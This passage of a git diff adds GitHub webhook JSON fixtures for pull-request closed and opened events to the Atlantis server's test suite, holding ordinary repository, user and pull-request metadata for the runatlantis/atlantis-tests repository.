+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json
new file mode 100644
index 0000000000..cc281a8d7a
--- /dev/null
+++ b/server/testfixtures/githubPullRequestClosedEvent.json
@@ -0,0 +1,468 @@
+{
+ "action": "closed",
+ "number": 2,
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
+ "id": 193308707,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+ "number": 2,
+ "state": "closed",
+ "locked": false,
+ "title": "Add new project layouts",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "body": "",
+ "created_at": "2018-06-07T12:45:41Z",
+ "updated_at": "2018-06-16T16:55:19Z",
+ "closed_at": "2018-06-16T16:55:19Z",
+ "merged_at": null,
+ "merge_commit_sha": "e96e1cea0d79f4ff07845060ade0b21ff1ffe37f",
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "requested_reviewers": [
+
+ ],
+ "requested_teams": [
+
+ ],
+ "labels": [
+
+ ],
+ "milestone": null,
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+ "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
+ "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e",
+ "head": {
+ "label": "runatlantis:atlantisyaml",
+ "ref": "atlantisyaml",
+ "sha": "5e2d140b2d74bf61675677f01dc947ae8512e18e",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "base": {
+ "label": "runatlantis:master",
+ "ref": "master",
+ "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "_links": {
+ "self": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
+ },
+ "html": {
+ "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
+ },
+ "issue": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
+ },
+ "comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
+ },
+ "review_comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
+ },
+ "review_comment": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+ },
+ "commits": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
+ },
+ "statuses": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e"
+ }
+ },
+ "author_association": "OWNER",
+ "merged": false,
+ "mergeable": true,
+ "rebaseable": true,
+ "mergeable_state": "clean",
+ "merged_by": null,
+ "comments": 62,
+ "review_comments": 0,
+ "maintainer_can_modify": false,
+ "commits": 3,
+ "additions": 198,
+ "deletions": 8,
+ "changed_files": 24
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json
new file mode 100644
index 0000000000..03ee106b5e
--- /dev/null
+++ b/server/testfixtures/githubPullRequestOpenedEvent.json
@@ -0,0 +1,468 @@
+{
+ "action": "opened",
+ "number": 2,
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
+ "id": 194034250,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTk0MDM0MjUw",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+ "number": 2,
+ "state": "open",
+ "locked": false,
+ "title": "branch",
